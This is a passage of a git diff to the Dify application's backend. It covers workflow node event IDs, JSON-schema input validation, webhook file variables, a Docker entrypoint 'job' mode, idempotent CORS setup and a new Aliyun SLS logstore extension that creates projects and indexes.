NodeRunIterationNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -676,7 +683,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationSucceededEvent) -> NodeRunIterationSucceededEvent: return NodeRunIterationSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -690,7 +697,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationFailedEvent) -> NodeRunIterationFailedEvent: return NodeRunIterationFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -705,7 +712,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: RunRetrieverResourceEvent) -> NodeRunRetrieverResourceEvent: return NodeRunRetrieverResourceEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, retriever_resources=event.retriever_resources, diff --git a/api/core/workflow/nodes/start/start_node.py b/api/core/workflow/nodes/start/start_node.py index 38effa79f7..36fc5078c5 100644 --- a/api/core/workflow/nodes/start/start_node.py +++ b/api/core/workflow/nodes/start/start_node.py @@ -1,3 +1,4 @@ +import json from typing import Any from jsonschema import Draft7Validator, ValidationError @@ -42,15 +43,25 @@ class StartNode(Node[StartNodeData]): if value is None and variable.required: raise ValueError(f"{key} is required in input form") - if not isinstance(value, dict): - raise ValueError(f"{key} must be a JSON object") - schema = variable.json_schema if not schema: continue + if not value: + continue + try: - Draft7Validator(schema).validate(value) + json_schema = json.loads(schema) + except json.JSONDecodeError as e: + raise ValueError(f"{schema} must be a valid JSON object") + + try: + json_value = json.loads(value) + except json.JSONDecodeError as e: + raise ValueError(f"{value} must be a valid JSON object") + + try: + Draft7Validator(json_schema).validate(json_value) except ValidationError as e: raise ValueError(f"JSON object for '{key}' does not match schema: {e.message}") - node_inputs[key] = value + node_inputs[key] = json_value diff --git a/api/core/workflow/nodes/trigger_webhook/node.py b/api/core/workflow/nodes/trigger_webhook/node.py index 3631c8653d..ec8c4b8ee3 100644 --- a/api/core/workflow/nodes/trigger_webhook/node.py +++ b/api/core/workflow/nodes/trigger_webhook/node.py @@ -1,14 +1,22 @@ +import logging from collections.abc import Mapping from typing import Any +from core.file import FileTransferMethod +from core.variables.types import SegmentType +from core.variables.variables import FileVariable from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus from core.workflow.enums import NodeExecutionType, NodeType from core.workflow.node_events import NodeRunResult from core.workflow.nodes.base.node import Node +from factories import file_factory +from factories.variable_factory import build_segment_with_type from .entities import ContentType, WebhookData +logger = logging.getLogger(__name__) + class TriggerWebhookNode(Node[WebhookData]): node_type = NodeType.TRIGGER_WEBHOOK @@ -60,6 +68,34 @@ class TriggerWebhookNode(Node[WebhookData]): outputs=outputs, ) + def generate_file_var(self, param_name: str, file: dict): + related_id = file.get("related_id") + transfer_method_value = file.get("transfer_method") + if transfer_method_value: + transfer_method = FileTransferMethod.value_of(transfer_method_value) + match transfer_method: + case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL: + file["upload_file_id"] = related_id + case FileTransferMethod.TOOL_FILE: + file["tool_file_id"] = related_id + case FileTransferMethod.DATASOURCE_FILE: + file["datasource_file_id"] = related_id + + try: + file_obj = file_factory.build_from_mapping( + mapping=file, + tenant_id=self.tenant_id, + ) + file_segment = build_segment_with_type(SegmentType.FILE, file_obj) + return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name]) + except ValueError: + logger.error( + "Failed to build FileVariable for webhook file parameter %s", + param_name, + exc_info=True, + ) + return None + def _extract_configured_outputs(self, webhook_inputs: dict[str, Any]) -> dict[str, Any]: """Extract outputs based on node configuration from webhook inputs.""" outputs = {} @@ -107,18 +143,33 @@ class TriggerWebhookNode(Node[WebhookData]): outputs[param_name] = str(webhook_data.get("body", {}).get("raw", "")) continue elif self.node_data.content_type == ContentType.BINARY: - outputs[param_name] = webhook_data.get("body", {}).get("raw", b"") + raw_data: dict = webhook_data.get("body", {}).get("raw", {}) + file_var = self.generate_file_var(param_name, raw_data) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = raw_data continue if param_type == "file": # Get File object (already processed by webhook controller) - file_obj = webhook_data.get("files", {}).get(param_name) - outputs[param_name] = file_obj + files = webhook_data.get("files", {}) + if files and isinstance(files, dict): + file = files.get(param_name) + if file and isinstance(file, dict): + file_var = self.generate_file_var(param_name, file) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = files + else: + outputs[param_name] = files + else: + outputs[param_name] = files else: # Get regular body parameter outputs[param_name] = webhook_data.get("body", {}).get(param_name) # Include raw webhook data for debugging/advanced use outputs["_webhook_raw"] = webhook_data - return outputs diff --git a/api/core/workflow/workflow_entry.py b/api/core/workflow/workflow_entry.py index d4ec29518a..ddf545bb34 100644 --- a/api/core/workflow/workflow_entry.py +++ b/api/core/workflow/workflow_entry.py @@ -14,7 +14,7 @@ from core.workflow.errors import WorkflowNodeRunFailedError from core.workflow.graph import Graph from core.workflow.graph_engine import GraphEngine from core.workflow.graph_engine.command_channels import InMemoryChannel -from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer +from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer, ObservabilityLayer from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent, GraphNodeEventBase, GraphRunFailedEvent from core.workflow.nodes import NodeType @@ -23,6 +23,7 @@ from core.workflow.nodes.node_mapping import NODE_TYPE_CLASSES_MAPPING from core.workflow.runtime import GraphRuntimeState, VariablePool from core.workflow.system_variable import SystemVariable from core.workflow.variable_loader import DUMMY_VARIABLE_LOADER, VariableLoader, load_into_variable_pool +from extensions.otel.runtime import is_instrument_flag_enabled from factories import file_factory from models.enums import UserFrom from models.workflow import Workflow @@ -98,6 +99,10 @@ class WorkflowEntry: ) self.graph_engine.layer(limits_layer) + # Add observability layer when OTel is enabled + if dify_config.ENABLE_OTEL or is_instrument_flag_enabled(): + self.graph_engine.layer(ObservabilityLayer()) + def run(self) -> Generator[GraphEngineEvent, None, None]: graph_engine = self.graph_engine diff --git a/api/docker/entrypoint.sh b/api/docker/entrypoint.sh index 6313085e64..5a69eb15ac 100755 --- a/api/docker/entrypoint.sh +++ b/api/docker/entrypoint.sh @@ -34,10 +34,10 @@ if [[ "${MODE}" == "worker" ]]; then if [[ -z "${CELERY_QUEUES}" ]]; then if [[ "${EDITION}" == "CLOUD" ]]; then # Cloud edition: separate queues for dataset and trigger tasks - DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" else # Community edition (SELF_HOSTED): dataset, pipeline and workflow have separate queues - DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" fi else DEFAULT_QUEUES="${CELERY_QUEUES}" @@ -69,6 +69,53 @@ if [[ "${MODE}" == "worker" ]]; then elif [[ "${MODE}" == "beat" ]]; then exec celery -A app.celery beat --loglevel ${LOG_LEVEL:-INFO} + +elif [[ "${MODE}" == "job" ]]; then + # Job mode: Run a one-time Flask command and exit + # Pass Flask command and arguments via container args + # Example K8s usage: + # args: + # - create-tenant + # - --email + # - admin@example.com + # + # Example Docker usage: + # docker run -e MODE=job dify-api:latest create-tenant --email admin@example.com + + if [[ $# -eq 0 ]]; then + echo "Error: No command specified for job mode." + echo "" + echo "Usage examples:" + echo " Kubernetes:" + echo " args: [create-tenant, --email, admin@example.com]" + echo "" + echo " Docker:" + echo " docker run -e MODE=job dify-api create-tenant --email admin@example.com" + echo "" + echo "Available commands:" + echo " create-tenant, reset-password, reset-email, upgrade-db," + echo " vdb-migrate, install-plugins, and more..." + echo "" + echo "Run 'flask --help' to see all available commands." + exit 1 + fi + + echo "Running Flask job command: flask $*" + + # Temporarily disable exit on error to capture exit code + set +e + flask "$@" + JOB_EXIT_CODE=$? + set -e + + if [[ ${JOB_EXIT_CODE} -eq 0 ]]; then + echo "Job completed successfully." + else + echo "Job failed with exit code ${JOB_EXIT_CODE}." + fi + + exit ${JOB_EXIT_CODE} + else if [[ "${DEBUG}" == "true" ]]; then exec flask run --host=${DIFY_BIND_ADDRESS:-0.0.0.0} --port=${DIFY_PORT:-5001} --debug diff --git a/api/events/event_handlers/clean_when_dataset_deleted.py b/api/events/event_handlers/clean_when_dataset_deleted.py index 1666e2e29f..d6007662d8 100644 --- a/api/events/event_handlers/clean_when_dataset_deleted.py +++ b/api/events/event_handlers/clean_when_dataset_deleted.py @@ -15,4 +15,5 @@ def handle(sender: Dataset, **kwargs): dataset.index_struct, dataset.collection_binding_id, dataset.doc_form, + dataset.pipeline_id, ) diff --git a/api/extensions/ext_blueprints.py b/api/extensions/ext_blueprints.py index 725e5351e6..cf994c11df 100644 --- a/api/extensions/ext_blueprints.py +++ b/api/extensions/ext_blueprints.py @@ -9,11 +9,21 @@ FILES_HEADERS: tuple[str, ...] = (*BASE_CORS_HEADERS, HEADER_NAME_CSRF_TOKEN) EXPOSED_HEADERS: tuple[str, ...] = ("X-Version", "X-Env", "X-Trace-Id") -def init_app(app: DifyApp): - # register blueprint routers +def _apply_cors_once(bp, /, **cors_kwargs): + """Make CORS idempotent so blueprints can be reused across multiple app instances.""" + + if getattr(bp, "_dify_cors_applied", False): + return from flask_cors import CORS + CORS(bp, **cors_kwargs) + bp._dify_cors_applied = True + + +def init_app(app: DifyApp): + # register blueprint routers + from controllers.console import bp as console_app_bp from controllers.files import bp as files_bp from controllers.inner_api import bp as inner_api_bp @@ -22,7 +32,7 @@ def init_app(app: DifyApp): from controllers.trigger import bp as trigger_bp from controllers.web import bp as web_bp - CORS( + _apply_cors_once( service_api_bp, allow_headers=list(SERVICE_API_HEADERS), methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"], @@ -30,7 +40,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(service_api_bp) - CORS( + _apply_cors_once( web_bp, resources={r"/*": {"origins": dify_config.WEB_API_CORS_ALLOW_ORIGINS}}, supports_credentials=True, @@ -40,7 +50,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(web_bp) - CORS( + _apply_cors_once( console_app_bp, resources={r"/*": {"origins": dify_config.CONSOLE_CORS_ALLOW_ORIGINS}}, supports_credentials=True, @@ -50,7 +60,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(console_app_bp) - CORS( + _apply_cors_once( files_bp, allow_headers=list(FILES_HEADERS), methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"], @@ -62,7 +72,7 @@ def init_app(app: DifyApp): app.register_blueprint(mcp_bp) # Register trigger blueprint with CORS for webhook calls - CORS( + _apply_cors_once( trigger_bp, allow_headers=["Content-Type", "Authorization", "X-App-Code"], methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH", "HEAD"], diff --git a/api/extensions/ext_logstore.py b/api/extensions/ext_logstore.py new file mode 100644 index 0000000000..502f0bb46b --- /dev/null +++ b/api/extensions/ext_logstore.py @@ -0,0 +1,74 @@ +""" +Logstore extension for Dify application. + +This extension initializes the logstore (Aliyun SLS) on application startup, +creating necessary projects, logstores, and indexes if they don't exist. +""" + +import logging +import os + +from dotenv import load_dotenv + +from dify_app import DifyApp + +logger = logging.getLogger(__name__) + + +def is_enabled() -> bool: + """ + Check if logstore extension is enabled. + + Returns: + True if all required Aliyun SLS environment variables are set, False otherwise + """ + # Load environment variables from .env file + load_dotenv() + + required_vars = [ + "ALIYUN_SLS_ACCESS_KEY_ID", + "ALIYUN_SLS_ACCESS_KEY_SECRET", + "ALIYUN_SLS_ENDPOINT", + "ALIYUN_SLS_REGION", + "ALIYUN_SLS_PROJECT_NAME", + ] + + all_set = all(os.environ.get(var) for var in required_vars) + + if not all_set: + logger.info("Logstore extension disabled: required Aliyun SLS environment variables not set") + + return all_set + + +def init_app(app: DifyApp): + """ + Initialize logstore on application startup. + + This function: + 1. Creates Aliyun SLS project if it doesn't exist + 2. Creates logstores (workflow_execution, workflow_node_execution) if they don't exist + 3. Creates indexes with field configurations based on PostgreSQL table structures + + This operation is idempotent and only executes once during application startup. + + Args: + app: The Dify application instance + """ + try: + from extensions.logstore.aliyun_logstore import AliyunLogStore + + logger.info("Initializing logstore...") + + # Create logstore client and initialize project/logstores/indexes + logstore_client = AliyunLogStore() + logstore_client.init_project_logstore() + + # Attach to app for potential later use + app.extensions["logstore"] = logstore_client + + logger.info("Logstore initialized successfully") + except Exception: + logger.exception("Failed to initialize logstore") + # Don't raise - allow application to continue even if logstore init fails + # This ensures that the application can still run if logstore is misconfigured diff --git a/api/extensions/ext_session_factory.py b/api/extensions/ext_session_factory.py new file mode 100644 index 0000000000..0eb43d66f4 --- /dev/null +++ b/api/extensions/ext_session_factory.py @@ -0,0 +1,7 @@ +from core.db.session_factory import configure_session_factory +from extensions.ext_database import db + + +def init_app(app): + with app.app_context(): + configure_session_factory(db.engine) diff --git a/api/extensions/logstore/__init__.py b/api/extensions/logstore/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/extensions/logstore/aliyun_logstore.py b/api/extensions/logstore/aliyun_logstore.py new file mode 100644 index 0000000000..22d1f473a3 --- /dev/null +++ b/api/extensions/logstore/aliyun_logstore.py @@ -0,0 +1,890 @@ +import logging +import os +import threading +import time +from collections.abc import Sequence +from typing import Any + +import sqlalchemy as sa +from aliyun.log import ( # type: ignore[import-untyped] + GetLogsRequest, + IndexConfig, + IndexKeyConfig, + IndexLineConfig, + LogClient, + LogItem, + PutLogsRequest, +) +from aliyun.log.auth import AUTH_VERSION_4 # type: ignore[import-untyped] +from aliyun.log.logexception import LogException # type: ignore[import-untyped] +from dotenv import load_dotenv +from sqlalchemy.orm import DeclarativeBase + +from configs import dify_config +from extensions.logstore.aliyun_logstore_pg import AliyunLogStorePG + +logger = logging.getLogger(__name__) + + +class AliyunLogStore: + """ + Singleton class for Aliyun SLS LogStore operations. + + Ensures only one instance exists to prevent multiple PG connection pools. + """ + + _instance: "AliyunLogStore | None" = None + _initialized: bool = False + + # Track delayed PG connection for newly created projects + _pg_connection_timer: threading.Timer | None = None + _pg_connection_delay: int = 90 # delay seconds + + # Default tokenizer for text/json fields and full-text index + # Common delimiters: comma, space, quotes, punctuation, operators, brackets, special chars + DEFAULT_TOKEN_LIST = [ + ",", + " ", + '"', + '"', + ";", + "=", + "(", + ")", + "[", + "]", + "{", + "}", + "?", + "@", + "&", + "<", + ">", + "/", + ":", + "\n", + "\t", + ] + + def __new__(cls) -> "AliyunLogStore": + """Implement singleton pattern.""" + if cls._instance is None: + cls._instance = super().__new__(cls) + return cls._instance + + project_des = "dify" + + workflow_execution_logstore = "workflow_execution" + + workflow_node_execution_logstore = "workflow_node_execution" + + @staticmethod + def _sqlalchemy_type_to_logstore_type(column: Any) -> str: + """ + Map SQLAlchemy column type to Aliyun LogStore index type. + + Args: + column: SQLAlchemy column object + + Returns: + LogStore index type: 'text', 'long', 'double', or 'json' + """ + column_type = column.type + + # Integer types -> long + if isinstance(column_type, (sa.Integer, sa.BigInteger, sa.SmallInteger)): + return "long" + + # Float types -> double + if isinstance(column_type, (sa.Float, sa.Numeric)): + return "double" + + # String and Text types -> text + if isinstance(column_type, (sa.String, sa.Text)): + return "text" + + # DateTime -> text (stored as ISO format string in logstore) + if isinstance(column_type, sa.DateTime): + return "text" + + # Boolean -> long (stored as 0/1) + if isinstance(column_type, sa.Boolean): + return "long" + + # JSON -> json + if isinstance(column_type, sa.JSON): + return "json" + + # Default to text for unknown types + return "text" + + @staticmethod + def _generate_index_keys_from_model(model_class: type[DeclarativeBase]) -> dict[str, IndexKeyConfig]: + """ + Automatically generate LogStore field index configuration from SQLAlchemy model. + + This method introspects the SQLAlchemy model's column definitions and creates + corresponding LogStore index configurations. When the PG schema is updated via + Flask-Migrate, this method will automatically pick up the new fields on next startup. + + Args: + model_class: SQLAlchemy model class (e.g., WorkflowRun, WorkflowNodeExecutionModel) + + Returns: + Dictionary mapping field names to IndexKeyConfig objects + """ + index_keys = {} + + # Iterate over all mapped columns in the model + if hasattr(model_class, "__mapper__"): + for column_name, column_property in model_class.__mapper__.columns.items(): + # Skip relationship properties and other non-column attributes + if not hasattr(column_property, "type"): + continue + + # Map SQLAlchemy type to LogStore type + logstore_type = AliyunLogStore._sqlalchemy_type_to_logstore_type(column_property) + + # Create index configuration + # - text fields: case_insensitive for better search, with tokenizer and Chinese support + # - all fields: doc_value=True for analytics + if logstore_type == "text": + index_keys[column_name] = IndexKeyConfig( + index_type="text", + case_sensitive=False, + doc_value=True, + token_list=AliyunLogStore.DEFAULT_TOKEN_LIST, + chinese=True, + ) + else: + index_keys[column_name] = IndexKeyConfig(index_type=logstore_type, doc_value=True) + + # Add log_version field (not in PG model, but used in logstore for versioning) + index_keys["log_version"] = IndexKeyConfig(index_type="long", doc_value=True) + + return index_keys + + def __init__(self) -> None: + # Skip initialization if already initialized (singleton pattern) + if self.__class__._initialized: + return + + load_dotenv() + + self.access_key_id: str = os.environ.get("ALIYUN_SLS_ACCESS_KEY_ID", "") + self.access_key_secret: str = os.environ.get("ALIYUN_SLS_ACCESS_KEY_SECRET", "") + self.endpoint: str = os.environ.get("ALIYUN_SLS_ENDPOINT", "") + self.region: str = os.environ.get("ALIYUN_SLS_REGION", "") + self.project_name: str = os.environ.get("ALIYUN_SLS_PROJECT_NAME", "") + self.logstore_ttl: int = int(os.environ.get("ALIYUN_SLS_LOGSTORE_TTL", 365)) + self.log_enabled: bool = os.environ.get("SQLALCHEMY_ECHO", "false").lower() == "true" + self.pg_mode_enabled: bool = os.environ.get("LOGSTORE_PG_MODE_ENABLED", "true").lower() == "true" + + # Initialize SDK client + self.client = LogClient( + self.endpoint, self.access_key_id, self.access_key_secret, auth_version=AUTH_VERSION_4, region=self.region + ) + + # Append Dify identification to the existing user agent + original_user_agent = self.client._user_agent # pyright: ignore[reportPrivateUsage] + dify_version = dify_config.project.version + enhanced_user_agent = f"Dify,Dify-{dify_version},{original_user_agent}" + self.client.set_user_agent(enhanced_user_agent) + + # PG client will be initialized in init_project_logstore + self._pg_client: AliyunLogStorePG | None = None + self._use_pg_protocol: bool = False + + self.__class__._initialized = True + + @property + def supports_pg_protocol(self) -> bool: + """Check if PG protocol is supported and enabled.""" + return self._use_pg_protocol + + def _attempt_pg_connection_init(self) -> bool: + """ + Attempt to initialize PG connection. + + This method tries to establish PG connection and performs necessary checks. + It's used both for immediate connection (existing projects) and delayed connection (new projects). + + Returns: + True if PG connection was successfully established, False otherwise. + """ + if not self.pg_mode_enabled or not self._pg_client: + return False + + try: + self._use_pg_protocol = self._pg_client.init_connection() + if self._use_pg_protocol: + logger.info("Successfully connected to project %s using PG protocol", self.project_name) + # Check if scan_index is enabled for all logstores + self._check_and_disable_pg_if_scan_index_disabled() + return True + else: + logger.info("PG connection failed for project %s. Will use SDK mode.", self.project_name) + return False + except Exception as e: + logger.warning( + "Failed to establish PG connection for project %s: %s. Will use SDK mode.", + self.project_name, + str(e), + ) + self._use_pg_protocol = False + return False + + def _delayed_pg_connection_init(self) -> None: + """ + Delayed initialization of PG connection for newly created projects. + + This method is called by a background timer 3 minutes after project creation. + """ + # Double check conditions in case state changed + if self._use_pg_protocol: + return + + logger.info( + "Attempting delayed PG connection for newly created project %s ...", + self.project_name, + ) + self._attempt_pg_connection_init() + self.__class__._pg_connection_timer = None + + def init_project_logstore(self): + """ + Initialize project, logstore, index, and PG connection. + + This method should be called once during application startup to ensure + all required resources exist and connections are established. + """ + # Step 1: Ensure project and logstore exist + project_is_new = False + if not self.is_project_exist(): + self.create_project() + project_is_new = True + + self.create_logstore_if_not_exist() + + # Step 2: Initialize PG client and connection (if enabled) + if not self.pg_mode_enabled: + logger.info("PG mode is disabled. Will use SDK mode.") + return + + # Create PG client if not already created + if self._pg_client is None: + logger.info("Initializing PG client for project %s...", self.project_name) + self._pg_client = AliyunLogStorePG( + self.access_key_id, self.access_key_secret, self.endpoint, self.project_name + ) + + # Step 3: Establish PG connection based on project status + if project_is_new: + # For newly created projects, schedule delayed PG connection + self._use_pg_protocol = False + logger.info( + "Project %s is newly created. Will use SDK mode and schedule PG connection attempt in %d seconds.", + self.project_name, + self.__class__._pg_connection_delay, + ) + if self.__class__._pg_connection_timer is not None: + self.__class__._pg_connection_timer.cancel() + self.__class__._pg_connection_timer = threading.Timer( + self.__class__._pg_connection_delay, + self._delayed_pg_connection_init, + ) + self.__class__._pg_connection_timer.daemon = True # Don't block app shutdown + self.__class__._pg_connection_timer.start() + else: + # For existing projects, attempt PG connection immediately + logger.info("Project %s already exists. Attempting PG connection...", self.project_name) + self._attempt_pg_connection_init() + + def _check_and_disable_pg_if_scan_index_disabled(self) -> None: + """ + Check if scan_index is enabled for all logstores. + If any logstore has scan_index=false, disable PG protocol. + + This is necessary because PG protocol requires scan_index to be enabled. + """ + logstore_name_list = [ + AliyunLogStore.workflow_execution_logstore, + AliyunLogStore.workflow_node_execution_logstore, + ] + + for logstore_name in logstore_name_list: + existing_config = self.get_existing_index_config(logstore_name) + if existing_config and not existing_config.scan_index: + logger.info( + "Logstore %s has scan_index=false, USE SDK mode for read/write operations. " + "PG protocol requires scan_index to be enabled.", + logstore_name, + ) + self._use_pg_protocol = False + # Close PG connection if it was initialized + if self._pg_client: + self._pg_client.close() + self._pg_client = None + return + + def is_project_exist(self) -> bool: + try: + self.client.get_project(self.project_name) + return True + except Exception as e: + if e.args[0] == "ProjectNotExist": + return False + else: + raise e + + def create_project(self): + try: + self.client.create_project(self.project_name, AliyunLogStore.project_des) + logger.info("Project %s created successfully", self.project_name) + except LogException as e: + logger.exception( + "Failed to create project %s: errorCode=%s, errorMessage=%s, requestId=%s", + self.project_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def is_logstore_exist(self, logstore_name: str) -> bool: + try: + _ = self.client.get_logstore(self.project_name, logstore_name) + return True + except Exception as e: + if e.args[0] == "LogStoreNotExist": + return False + else: + raise e + + def create_logstore_if_not_exist(self) -> None: + logstore_name_list = [ + AliyunLogStore.workflow_execution_logstore, + AliyunLogStore.workflow_node_execution_logstore, + ] + + for logstore_name in logstore_name_list: + if not self.is_logstore_exist(logstore_name): + try: + self.client.create_logstore( + project_name=self.project_name, logstore_name=logstore_name, ttl=self.logstore_ttl + ) + logger.info("logstore %s created successfully", logstore_name) + except LogException as e: + logger.exception( + "Failed to create logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + # Ensure index contains all Dify-required fields + # This intelligently merges with existing config, preserving custom indexes + self.ensure_index_config(logstore_name) + + def is_index_exist(self, logstore_name: str) -> bool: + try: + _ = self.client.get_index_config(self.project_name, logstore_name) + return True + except Exception as e: + if e.args[0] == "IndexConfigNotExist": + return False + else: + raise e + + def get_existing_index_config(self, logstore_name: str) -> IndexConfig | None: + """ + Get existing index configuration from logstore. + + Args: + logstore_name: Name of the logstore + + Returns: + IndexConfig object if index exists, None otherwise + """ + try: + response = self.client.get_index_config(self.project_name, logstore_name) + return response.get_index_config() + except Exception as e: + if e.args[0] == "IndexConfigNotExist": + return None + else: + logger.exception("Failed to get index config for logstore %s", logstore_name) + raise e + + def _get_workflow_execution_index_keys(self) -> dict[str, IndexKeyConfig]: + """ + Get field index configuration for workflow_execution logstore. + + This method automatically generates index configuration from the WorkflowRun SQLAlchemy model. + When the PG schema is updated via Flask-Migrate, the index configuration will be automatically + updated on next application startup. + """ + from models.workflow import WorkflowRun + + index_keys = self._generate_index_keys_from_model(WorkflowRun) + + # Add custom fields that are in logstore but not in PG model + # These fields are added by the repository layer + index_keys["error_message"] = IndexKeyConfig( + index_type="text", + case_sensitive=False, + doc_value=True, + token_list=self.DEFAULT_TOKEN_LIST, + chinese=True, + ) # Maps to 'error' in PG + index_keys["started_at"] = IndexKeyConfig( + index_type="text", + case_sensitive=False, + doc_value=True, + token_list=self.DEFAULT_TOKEN_LIST, + chinese=True, + ) # Maps to 'created_at' in PG + + logger.info("Generated %d index keys for workflow_execution from WorkflowRun model", len(index_keys)) + return index_keys + + def _get_workflow_node_execution_index_keys(self) -> dict[str, IndexKeyConfig]: + """ + Get field index configuration for workflow_node_execution logstore. + + This method automatically generates index configuration from the WorkflowNodeExecutionModel. + When the PG schema is updated via Flask-Migrate, the index configuration will be automatically + updated on next application startup. + """ + from models.workflow import WorkflowNodeExecutionModel + + index_keys = self._generate_index_keys_from_model(WorkflowNodeExecutionModel) + + logger.debug( + "Generated %d index keys for workflow_node_execution from WorkflowNodeExecutionModel", len(index_keys) + ) + return index_keys + + def _get_index_config(self, logstore_name: str) -> IndexConfig: + """ + Get index configuration for the specified logstore. + + Args: + logstore_name: Name of the logstore + + Returns: + IndexConfig object with line and field indexes + """ + # Create full-text index (line config) with tokenizer + line_config = IndexLineConfig(token_list=self.DEFAULT_TOKEN_LIST, case_sensitive=False, chinese=True) + + # Get field index configuration based on logstore name + field_keys = {} + if logstore_name == AliyunLogStore.workflow_execution_logstore: + field_keys = self._get_workflow_execution_index_keys() + elif logstore_name == AliyunLogStore.workflow_node_execution_logstore: + field_keys = self._get_workflow_node_execution_index_keys() + + # key_config_list should be a dict, not a list + # Create index config with both line and field indexes + return IndexConfig(line_config=line_config, key_config_list=field_keys, scan_index=True) + + def create_index(self, logstore_name: str) -> None: + """ + Create index for the specified logstore with both full-text and field indexes. + Field indexes are automatically generated from the corresponding SQLAlchemy model. + """ + index_config = self._get_index_config(logstore_name) + + try: + self.client.create_index(self.project_name, logstore_name, index_config) + logger.info( + "index for %s created successfully with %d field indexes", + logstore_name, + len(index_config.key_config_list or {}), + ) + except LogException as e: + logger.exception( + "Failed to create index for logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def _merge_index_configs( + self, existing_config: IndexConfig, required_keys: dict[str, IndexKeyConfig], logstore_name: str + ) -> tuple[IndexConfig, bool]: + """ + Intelligently merge existing index config with Dify's required field indexes. + + This method: + 1. Preserves all existing field indexes in logstore (including custom fields) + 2. Adds missing Dify-required fields + 3. Updates fields where type doesn't match (with json/text compatibility) + 4. Corrects case mismatches (e.g., if Dify needs 'status' but logstore has 'Status') + + Type compatibility rules: + - json and text types are considered compatible (users can manually choose either) + - All other type mismatches will be corrected to match Dify requirements + + Note: Logstore is case-sensitive and doesn't allow duplicate fields with different cases. + Case mismatch means: existing field name differs from required name only in case. + + Args: + existing_config: Current index configuration from logstore + required_keys: Dify's required field index configurations + logstore_name: Name of the logstore (for logging) + + Returns: + Tuple of (merged_config, needs_update) + """ + # key_config_list is already a dict in the SDK + # Make a copy to avoid modifying the original + existing_keys = dict(existing_config.key_config_list) if existing_config.key_config_list else {} + + # Track changes + needs_update = False + case_corrections = [] # Fields that need case correction (e.g., 'Status' -> 'status') + missing_fields = [] + type_mismatches = [] + + # First pass: Check for and resolve case mismatches with required fields + # Note: Logstore itself doesn't allow duplicate fields with different cases, + # so we only need to check if the existing case matches the required case + for required_name in required_keys: + lower_name = required_name.lower() + # Find key that matches case-insensitively but not exactly + wrong_case_key = None + for existing_key in existing_keys: + if existing_key.lower() == lower_name and existing_key != required_name: + wrong_case_key = existing_key + break + + if wrong_case_key: + # Field exists but with wrong case (e.g., 'Status' when we need 'status') + # Remove the wrong-case key, will be added back with correct case later + case_corrections.append((wrong_case_key, required_name)) + del existing_keys[wrong_case_key] + needs_update = True + + # Second pass: Check each required field + for required_name, required_config in required_keys.items(): + # Check for exact match (case-sensitive) + if required_name in existing_keys: + existing_type = existing_keys[required_name].index_type + required_type = required_config.index_type + + # Check if type matches + # Special case: json and text are interchangeable for JSON content fields + # Allow users to manually configure text instead of json (or vice versa) without forcing updates + is_compatible = existing_type == required_type or ({existing_type, required_type} == {"json", "text"}) + + if not is_compatible: + type_mismatches.append((required_name, existing_type, required_type)) + # Update with correct type + existing_keys[required_name] = required_config + needs_update = True + # else: field exists with compatible type, no action needed + else: + # Field doesn't exist (may have been removed in first pass due to case conflict) + missing_fields.append(required_name) + existing_keys[required_name] = required_config + needs_update = True + + # Log changes + if missing_fields: + logger.info( + "Logstore %s: Adding %d missing Dify-required fields: %s", + logstore_name, + len(missing_fields), + ", ".join(missing_fields[:10]) + ("..." if len(missing_fields) > 10 else ""), + ) + + if type_mismatches: + logger.info( + "Logstore %s: Fixing %d type mismatches: %s", + logstore_name, + len(type_mismatches), + ", ".join([f"{name}({old}->{new})" for name, old, new in type_mismatches[:5]]) + + ("..." if len(type_mismatches) > 5 else ""), + ) + + if case_corrections: + logger.info( + "Logstore %s: Correcting %d field name cases: %s", + logstore_name, + len(case_corrections), + ", ".join([f"'{old}' -> '{new}'" 